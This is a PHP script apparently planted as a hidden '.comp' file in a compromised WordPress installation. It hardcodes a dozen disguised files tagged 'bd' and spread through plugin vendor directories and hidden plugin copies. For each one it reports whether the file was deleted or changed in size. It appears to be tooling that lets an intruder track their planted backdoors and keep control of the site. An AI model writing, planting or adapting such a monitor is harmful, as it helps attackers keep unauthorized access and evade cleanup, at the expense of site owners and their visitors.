File: /home/digital/public_html/wp-includes/widgets/.comp
<?php $r = '/home/digital/public_html'; $x = ["/wp-content/plugins/file-manager-advanced/application/library/php-parser/vendor/nikic/php-parser/lib/PhpParser/PrettyPrinter/criteria.php"=>"bd@@1149954@@975",
"/wp-content/plugins/.quform-back/library/PhpSpreadsheet/vendor/markbaker/matrix/classes/src/operations/Tidy.php"=>"bd@@1158461@@1027",
"/wp-content/plugins/.quform-back/library/PhpSpreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Cell/jpgraph_antispam.php"=>"bd@@1150040@@992",
"/wp-content/plugins/quform/library/PhpSpreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Shared/Escher/DgContainer/SpgrContainer/captcha.class.php"=>"bd@@1157998@@941",
"/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/phpunit/phpunit/src/Util/PHP/import_status.php"=>"bd@@1158276@@1033",
"/wp-content/plugins/file-manager-advanced/application/library/php-parser/vendor/nikic/php-parser/lib/PhpParser/Lexer/TokenEmulator/rfind.php"=>"bd@@1149846@@938",
"/wp-content/plugins/really-simple-ssl/lets-encrypt/vendor/plesk/api-php-lib/src/Api/Struct/EventLog/imagefront.php"=>"bd@@1150104@@983",
"/wp-includes/widgets/bottom-1769094554.php"=>"bd@@1162917@@899",
"/wp-content/languages/search_template_1769173849.php"=>"bd@@1182903@@1099",
"/wp-content/plugins/quform/library/PhpSpreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Document/link_navi.php"=>"bd@@1158592@@918",
"/wp-content/plugins/quform/library/PhpSpreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Worksheet/Drawing/am.topic.php"=>"bd@@1158123@@952",
"/wp-content/plugins/really-simple-ssl/lets-encrypt/vendor/plesk/api-php-lib/src/Api/Struct/SiteAlias/log.php"=>"bd@@1150191@@924"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');